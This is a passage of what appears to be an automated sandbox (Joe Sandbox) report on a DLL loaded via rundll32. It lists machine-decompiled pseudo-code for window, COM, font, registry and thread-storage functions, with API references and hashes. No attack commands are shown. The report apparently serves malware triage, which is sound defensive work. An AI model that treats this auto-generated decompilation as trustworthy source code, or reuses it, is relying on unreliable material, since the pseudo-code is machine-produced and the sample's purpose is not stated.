					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E100260E8(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100094AF( *((intOrPtr*)(_t239 + 8))) != 0 && E10009E59( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000AB40( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E10007AF1(_t183,  *(_t239 - 0x24) + 0xa0, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E10026453(_t239 - 0x94, _t218);
				E10002EB0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E10011A49(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 10007B43
MapDialogRect.USER32(?,?), ref: 10007BD1
SysAllocStringLen.OLEAUT32(?,00000000), ref: 10007BF2
CLSIDFromString.OLE32(?,00000004), ref: 10007CF0
CLSIDFromProgID.OLE32(?,00000004), ref: 10007CF8
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007D94
SysFreeString.OLEAUT32(?), ref: 10007DE7

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID:
API String ID: 493809305-0
Opcode ID: d223bc54a626a02d4bdcfc234b8878bf8d1ea5ffda65f270a6bc6aa76187da1e
Instruction ID: f547f69fa172702107a7ee223b42c8d3fa36414f4287a314810d9a195d7f22cd
Opcode Fuzzy Hash: d223bc54a626a02d4bdcfc234b8878bf8d1ea5ffda65f270a6bc6aa76187da1e
Instruction Fuzzy Hash: DEA10575D00219DFEB04DFA8C884AEEBBF5FF08344F104169E809A7255E775AE95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10020530 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10020530(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100229FB(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E1001E16D();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E1001E471();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E10022AD3(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E1001E3DD(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E1002A4EB();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E10022AD3(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}

APIs

GetParent.USER32(?), ref: 1002055E
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10020585
UpdateWindow.USER32(?), ref: 1002059F
SendMessageA.USER32(?,00000121,00000000,?), ref: 100205C3
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 100205DD
UpdateWindow.USER32(?), ref: 10020623
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10020657

Part of subcall function 100229FB: GetWindowLongA.USER32 ref: 10022A06

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: cb65867a9eb4373c6158ee252cbb866d2ad7f8a6270f2639e921e437d508cde4
Instruction ID: 57a57a635c9564d307a5664724594e8b67eaefdebe0d18bb17d264317e7a92ae
Opcode Fuzzy Hash: cb65867a9eb4373c6158ee252cbb866d2ad7f8a6270f2639e921e437d508cde4
Instruction Fuzzy Hash: EE419F30604B919FE721DF25EC88A1FBAF6FBC0B94F90092DF481914A2C772DA55CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10009811 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
comstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10009811(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				void* _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E10011A8C(E1002AB00, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x10036148(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1002d808;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E1000947C(_t109 - 0x54, 0x11) != 0 || E1000947C(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x100073e4
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x78)) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E100116D0(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E10008BC0(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E10024F03(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E10028C6E(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x1002fc08, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					if(_t79 < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E10024F5E(_t109 - 0x8c);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1002c6ac;
				_t81 = E10025123(_t109 - 0x54);
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E10011A49(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 10009816
GetObjectA.GDI32(100073E4,0000003C,?), ref: 10009882
lstrlenA.KERNEL32(?), ref: 10009893
GetDeviceCaps.GDI32(?,0000005A), ref: 1000990A
OleCreateFontIndirect.OLEAUT32(00000020,1002FC08,?), ref: 10009936

Strings

, xrefs: 1000988C

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
String ID:
API String ID: 4082312370-3916222277
Opcode ID: 84249b34ba599e10f86a748b11bf971323544bb7ceb798a99d45ae20e4f25649
Instruction ID: 5cc4d931916d525f60b51837989f0dcd116bbc250f3dd37a85cd7baf65b0ea70
Opcode Fuzzy Hash: 84249b34ba599e10f86a748b11bf971323544bb7ceb798a99d45ae20e4f25649
Instruction Fuzzy Hash: 68418775D01259AFDB10DFE4C981ADDBBB4FF09380F60802AE456E7296EB349A09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100270F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E100270F4(void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t46;
				intOrPtr* _t65;
				void* _t85;
				void* _t88;

				_t79 = __edx;
				E10011A8C(E1002A7A1, _t88);
				_t37 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t88 - 0x10)) = _t37;
				_t85 = __ecx;
				 *(_t88 - 0x120) = 0;
				_t38 = E10025DD7(__ecx, __edx);
				 *((intOrPtr*)(_t88 - 0x128)) = _t38;
				if(_t38 != 0) {
					do {
						_t79 = _t88 - 0x128;
						_t65 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x54)))) + 0x14))(_t88 - 0x128);
						if(_t65 != 0) {
							_t79 =  *_t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *((intOrPtr*)(_t88 - 0x128)) != 0);
				}
				_t98 =  *((intOrPtr*)(_t85 + 0x50));
				if( *((intOrPtr*)(_t85 + 0x50)) != 0) {
					_push("Software\\");
					E100072DF(_t88 - 0x11c, _t98);
					 *((intOrPtr*)(_t88 - 4)) = 0;
					E10025EA9(_t88 - 0x11c,  *((intOrPtr*)(_t85 + 0x50)));
					_push(0x1002bd94);
					_push(_t88 - 0x11c);
					_push(_t88 - 0x12c);
					_t46 = E10025E2B(_t88 - 0x11c);
					_push( *((intOrPtr*)(_t85 + 0x64)));
					 *((char*)(_t88 - 4)) = 1;
					_push(_t46);
					_push(_t88 - 0x124);
					E10025E2B(_t88 - 0x11c);
					 *((char*)(_t88 - 4)) = 3;
					E10002EB0( *((intOrPtr*)(_t88 - 0x12c)) + 0xfffffff0, _t79);
					_push(_t88 - 0x124);
					_push(0x80000001);
					E10026FE0(_t79);
					if(RegOpenKeyA(0x80000001,  *(_t88 - 0x11c), _t88 - 0x120) == 0) {
						if(RegEnumKeyA( *(_t88 - 0x120), 0, _t88 - 0x118, 0x104) == 0x103) {
							_push(_t88 - 0x11c);
							_push(0x80000001);
							E10026FE0(_t79);
						}
						RegCloseKey( *(_t88 - 0x120));
					}
					RegQueryValueA(0x80000001,  *(_t88 - 0x124), _t88 - 0x118, _t88 - 0x130);
					E10002EB0( *(_t88 - 0x124) - 0x10, _t79);
					E10002EB0( &(( *(_t88 - 0x11c))[0xfffffffffffffff0]), _t79);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return E10011A49(1,  *((intOrPtr*)(_t88 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 100270F9
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 100271D9
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 100271F6
RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 10027216
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 10027232

Strings

Software\, xrefs: 10027157

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseEnumH_prologOpenQueryValue
String ID: Software\
API String ID: 2161548231-964853688
Opcode ID: 8f5fb9bf604774f2f5c8c0ad35911cd31ac057cb48825dd578bb46884a2ac58f
Instruction ID: 1962ef047869c5eae126c053f5c8d1b80abc1b32300226f6e0fa91ddc6302b51
Opcode Fuzzy Hash: 8f5fb9bf604774f2f5c8c0ad35911cd31ac057cb48825dd578bb46884a2ac58f
Instruction Fuzzy Hash: 8F41BA31800529ABDB26DB64DC85EEFB7B9FF49300F500299F149E2152DB30AA95CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100284C5 Relevance: 10.6, APIs: 7, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E100284C5(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x10039e60
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E100281B1(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10028417(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0xb00a50
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001D1DB(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10012400(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}

APIs

EnterCriticalSection.KERNEL32(10039E60,00000000,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772), ref: 100284D5
TlsGetValue.KERNEL32(10039E44,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772,1001E169), ref: 100284F3
LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4), ref: 1002854F
LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756), ref: 10028561
LeaveCriticalSection.KERNEL32(?,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772,1001E169), ref: 1002856E
TlsSetValue.KERNEL32(10039E44,00000000), ref: 1002859E
LeaveCriticalSection.KERNEL32(10039E60,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772,1001E169), ref: 100285BF

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$AllocLeaveLocalValue$Enter
String ID:
API String ID: 784703316-0
Opcode ID: 9183edeeeb5f95f15655831d666d7e5e2ea29da455bb9ff138bfc0532bd952bc
Instruction ID: 42035923af3460843ea60695f227a8d276cd2f9a2398779c9dcc3b04898e1297
Opcode Fuzzy Hash: 9183edeeeb5f95f15655831d666d7e5e2ea29da455bb9ff138bfc0532bd952bc
Instruction Fuzzy Hash: 15317679601A25AFD724DF54D8D8C5ABBA9FF043543A1C52AF81A87A11C730FEA1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FAB7 Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000FAB7(void* __ebx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E10020A8C(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0 || E10022AF4(_t42) != 0) {
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							} else {
								goto L12;
							}
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000FAB7(_t37);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E10020A8C(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000FA62(_t45, E10020A8C(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E10020A8C(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E10020A8C(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}

APIs

GetWindow.USER32(?,00000002), ref: 1000FAD2
GetParent.USER32(?), ref: 1000FAE3
GetWindow.USER32(?,00000002), ref: 1000FB06
GetWindow.USER32(?,00000002), ref: 1000FB18
GetWindowLongA.USER32 ref: 1000FB27
IsWindowVisible.USER32(?), ref: 1000FB41
GetTopWindow.USER32(?), ref: 1000FB67

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 45c12b3cd154513775a3311c7b08edcc1f922599047287d4c4c0225d90245408
Instruction ID: dadbd9181cf10047d4cafaf7575538d4f8b8fbdb8f288736131f18669cff5b5d
Opcode Fuzzy Hash: 45c12b3cd154513775a3311c7b08edcc1f922599047287d4c4c0225d90245408
Instruction Fuzzy Hash: A121C232601B24ABF621EB60DC59F2B76DCEF847D0F518918F941D7996CB24EC01EAA1

Uniqueness

Uniqueness Score: -1.00%

Function 10006840 Relevance: 10.6, APIs: 7, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006840() {
				char _v4;
				intOrPtr _v16;
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				intOrPtr* _t24;
				long _t27;
				signed int _t34;
				int _t38;
				long _t39;
				void* _t43;

				_t38 = 0;
				_t39 = _t27;
				if(SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0) <= 0) {
					L7:
					SendMessageA( *(_t39 + 0x9cc), 0x1009, 0, 0);
					EnumWindows(E10006560, _t39);
					return SendMessageA( *(_t39 + 0x9cc), 0x1030, 0, 0);
				}
				do {
					if(SendMessageA( *(_t39 + 0x9cc), 0x102c, _t38, 2) == 2) {
						_push(1);
						_push(_t38);
						_t34 =  &_v4;
						_push(_t34);
						_t21 = E100114D3( *((intOrPtr*)(E1001D60B(_t39 + 0x9b0))));
						_t43 = _t43 + 4;
						ShowWindow(_t21, 0);
						_t24 = _v16 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						if((_t34 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t24)) + 4))(_t24);
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 < SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0));
				goto L7;
			}

APIs

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 1000685C
SendMessageA.USER32(?,0000102C,00000000,00000002), ref: 1000687F
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 100068D8

Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32(?,0000102D,?,-00000044), ref: 1001D670

ShowWindow.USER32(00000000), ref: 100068A7
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 100068EF
EnumWindows.USER32(Function_00006560), ref: 100068F7
SendMessageA.USER32(?,00001030,00000000,00000000), ref: 1000690D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$EnumH_prologShowWindowWindows
String ID:
API String ID: 1436300307-0
Opcode ID: b8330077a7c6c91814cf80aa7aa8760510c976a19c8b30208adaa8cfe6adeadc
Instruction ID: e09e5b1bfb2508a3607c84e4c2ec21d5782fafdb158dd9b7f3b164ad392aa89a
Opcode Fuzzy Hash: b8330077a7c6c91814cf80aa7aa8760510c976a19c8b30208adaa8cfe6adeadc
Instruction Fuzzy Hash: 7221D8B1A417416BF320D779CC86F97B7A9EBC9B64F208618F2559B1D1CAB0F841C724

Uniqueness

Uniqueness Score: -1.00%

Function 10006920 Relevance: 10.6, APIs: 7, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006920() {
				char _v4;
				intOrPtr _v16;
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				intOrPtr* _t24;
				long _t27;
				signed int _t34;
				int _t38;
				long _t39;
				void* _t43;

				_t38 = 0;
				_t39 = _t27;
				if(SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0) <= 0) {
					L7:
					SendMessageA( *(_t39 + 0x9cc), 0x1009, 0, 0);
					EnumWindows(E10006560, _t39);
					return SendMessageA( *(_t39 + 0x9cc), 0x1030, 0, 0);
				}
				do {
					if(SendMessageA( *(_t39 + 0x9cc), 0x102c, _t38, 2) == 2) {
						_push(1);
						_push(_t38);
						_t34 =  &_v4;
						_push(_t34);
						_t21 = E100114D3( *((intOrPtr*)(E1001D60B(_t39 + 0x9b0))));
						_t43 = _t43 + 4;
						ShowWindow(_t21, 5);
						_t24 = _v16 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						if((_t34 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t24)) + 4))(_t24);
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 < SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0));
				goto L7;
			}

APIs

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 1000693C
SendMessageA.USER32(?,0000102C,00000000,00000002), ref: 1000695F
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 100069B8

